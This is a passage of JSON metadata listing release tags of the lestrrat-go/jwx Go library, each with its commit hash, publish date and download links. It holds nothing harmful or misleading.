.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.12/manifests"},{"name":"v2.0.11","sha":"6c41e3822485fc7e11dd70b4b0524b075d66b103","kind":"commit","published_at":"2023-06-14T08:15:57.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.11","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.11/manifests"},{"name":"v1.2.26","sha":"d9ddbc8e5009cfdd8c28413390b67afa7f576dd6","kind":"commit","published_at":"2023-06-14T08:09:12.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.26","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.26/manifests"},{"name":"v2.0.10","sha":"8840ffd4afc5839f591ff0e9ba9034af52b1643e","kind":"commit","published_at":"2023-06-12T07:24:20.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.10","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.10/manifests"},{"name":"v2.0.9","sha":"fccc52457a90ce00d625c3ed8d5d3443e903a91b","kind":"commit","published_at":"2023-03-21T03:29:06.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.9","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.9/manifests"},{"name":"v2.0.8","sha":"7803b82f35c80ed24b6d8b730a11983f751904b8","kind":"commit","published_at":"2022-11-25T00:58:35.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.8","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.8/manifests"},{"name":"v2.0.7","sha":"6e8e91832b11d1d13f53b5e0b9a49fcd10db1f27","kind":"commit","published_at":"2022-11-15T01:54:59.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.7/manifests"},{"name":"v2.0.6","sha":"92950642291a3af54c5f1455ec68e76b390587ae","kind":"commit","published_at":"2022-08-25T13:19:48.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"c599c15c345121b1223fb7a744eaa07fdfe5e95e","kind":"commit","published_at":"2022-08-11T00:18:55.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"21f292826bf5f4cb76be98dcdfef9ce635835b5e","kind":"commit","published_at":"2022-07-19T05:24:38.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"650fe90d166ba9ada98474be3b9f6450701ffb71","kind":"commit","published_at":"2022-06-13T12:26:04.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"dc603b6e88971ce0c477c48fd8b77e84ffefb169","kind":"commit","published_at":"2022-05-23T12:58:39.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.2/manifests"},{"name":"v1.2.25","sha":"ad8c29d1628435cdad008b5cbbfbe75f5bfc74ae","kind":"commit","published_at":"2022-05-23T12:48:33.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.25","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.25/manifests"},{"name":"v2.0.1","sha":"0d365e4523faae8e9f3bbcbd5bc3a09cab951d49","kind":"commit","published_at":"2022-05-06T00:39:15.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.1/manifests"},{"name":"v1.2.24","sha":"e38f677839edbeae5480e993d73eacb94f7af581","kind":"commit","published_at":"2022-05-05T01:00:31.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.24","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.24/manifests"},{"name":"v2.0.0","sha":"8f97f606570bc3de90005ce3188824e7e7eff88a","kind":"commit","published_at":"2022-04-24T04:18:24.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0/manifests"},{"name":"v2.0.0-beta2","sha":"fd8fafc9fe0a7310d9dec456168a452d571c16b0","kind":"commit","published_at":"2022-04-16T06:50:40.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.0-beta2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-beta2/manifests"},{"name":"v1.2.23","sha":"baba5610e7fb53402e23c955edc10dbb25d73275","kind":"commit","published_at":"2022-04-13T09:52:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.23","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.23/manifests"},{"name":"v2.0.0-beta1","sha":"0258045345942aed8b8694da94cfb5ab4dd3261c","kind":"commit","published_at":"2022-04-09T13:16:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.0-beta1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-beta1/manifests"},{"name":"v1.2.22","sha":"f4701e19d38b7fd1ede0ef785867e078016b516e","kind":"commit","published_at":"2022-04-08T11:18:28.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.22","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.22/manifests"},{"name":"v2.0.0-alpha1","sha":"8a69aa2dd6b9a7a8284584cdd23acd96613c0866","kind":"commit","published_at":"2022-04-03T23:49:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.0-alpha1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.0-alpha1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.0-alpha1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-alpha1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-alpha1/manifests"},{"name":"v1.2.21","sha":"7b28f4c7fabe44249b77e058e5ca33c82b599d5e","kind":"commit","published_at":"2022-03-29T22:49:40.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.21","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.21/manifests"},{"name":"v1.2.20","sha":"3fa12c9bedcebd03db23f61cfb65ae0b040bf211","kind":"commit","published_at":"2022-03-03T05:56:32.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.20","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.20/manifests"},{"name":"v1.2.19","sha":"1c0a87feccf45c59a54ee3c9f2a995ab777953e7","kind":"commit","published_at":"2022-02-22T01:40:38.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.19","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.19/manifests"},{"name":"v1.2.18","sha":"2ab72de258ac966aeec3cfb836209692ed345586","kind":"commit","published_at":"2022-01-23T00:22:42.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.18","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.18/manifests"},{"name":"v1.2.17","sha":"300b79a15b99559ba7ad22e4275ecc99a07c359b","kind":"commit","published_at":"2022-01-12T10:10:06.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.17","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.17/manifests"},{"name":"v1.2.16","sha":"9349cc843391834794d593c4daa1345de1ab357e","kind":"commit","published_at":"2022-01-12T05:29:13.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.16","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.16/manifests"},{"name":"v1.2.15","sha":"5ded25fd0bf8f759a96a7ae3937df829d8e4777d","kind":"commit","published_at":"2022-01-06T23:30:16.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.15","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.15/manifests"},{"name":"v1.2.14","sha":"de7d9bca43812abc4f630320f8632108ccfe34bf","kind":"commit","published_at":"2021-12-22T01:34:54.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.14","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.14/manifests"},{"name":"v1.2.13","sha":"59f4c03c3e0aeb44f6b6a57fd96b90f9a679f880","kind":"commit","published_at":"2021-12-07T02:59:52.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.13","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.13/manifests"},{"name":"v1.2.12","sha":"45e532bbe4ada174b16f5f170ea62d2c8d83ef77","kind":"commit","published_at":"2021-12-01T06:52:40.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.12","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.12/manifests"},{"name":"v1.2.11","sha":"e371adc10f659fa05b064274ff549a8e0353d2b6","kind":"commit","published_at":"2021-11-13T15:34:01.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.11","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.11/manifests"},{"name":"v1.2.10","sha":"09a4d070eb0ec840a33597a67a17e6cddb53da87","kind":"commit","published_at":"2021-11-09T09:16:28.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.10","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.10/manifests"},{"name":"v1.2.9","sha":"b2da2238b7b342a8889470b901ef3024dfc0712a","kind":"commit","published_at":"2021-10-26T01:00:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.9","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.9/manifests"},{"name":"v1.2.8","sha":"f2bdd8c9df46d61fe987fa36bcc87c58ef846046","kind":"commit","published_at":"2021-10-21T01:23:06.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.8","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.8/manifests"},{"name":"v1.2.7","sha":"b9292016a6572dce779109d8da8d813b85abb658","kind":"commit","published_at":"2021-09-26T06:08:18.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.7/manifests"},{"name":"v1.2.6","sha":"41b30b67e905482292496e528119fc7482482ab3","kind":"commit","published_at":"2021-08-24T07:56:45.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.6/manifests"},{"name":"v1.2.5","sha":"551083cda79fd07493bf0db6e825278dd88c1fc3","kind":"commit","published_at":"2021-08-04T12:17:57.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.5/manifests"},{"name":"v1.2.4","sha":"d01528f5e5ae3221a48f67570928867e98184bbd","kind":"commit","published_at":"2021-07-15T13:26:23.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.4/manifests"},{"name":"v1.2.3","sha":"5e2de6ea11b5112bdf1a5e088d56c9c2e7fb6807","kind":"commit","published_at":"2021-07-15T09:53:13.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.3/manifests"},{"name":"v1.2.2","sha":"7159c501c5a43f8788f3a9a0961e146480c28eae","kind":"commit","published_at":"2021-07-12T23:38:00.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.2/manifests"},{"name":"v1.2.1","sha":"08de34253bc9633a11b019b143a2d212f8ff0ed8","kind":"commit","published_at":"2021-06-01T23:24:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.1/manifests"},{"name":"v1.2.0","sha":"20fcd2aaea33121a0da375914a254615b3527c46","kind":"commit","published_at":"2021-04-29T23:40:49.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.0/manifests"},{"name":"v1.1.8-rc1","sha":"4fc7156e9562e4b51143220e830ed2d32279d2f6","kind":"commit","published_at":"2021-04-08T12:05:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.8-rc1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.8-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.8-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.8-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.8-rc1/manifests"},{"name":"v1.1.7","sha":"db72eadbbe21fa7dc37d5628acfaa803fbf7d96e","kind":"commit","published_at":"2021-04-02T13:09:54.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.7/manifests"},{"name":"v1.1.7-rc1","sha":"afd2d647f5892a70ab72ee14e9985ab5028bfb23","kind":"commit","published_at":"2021-03-31T06:49:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.7-rc1","html_url":"https://github.com/lestrrat-go/jwx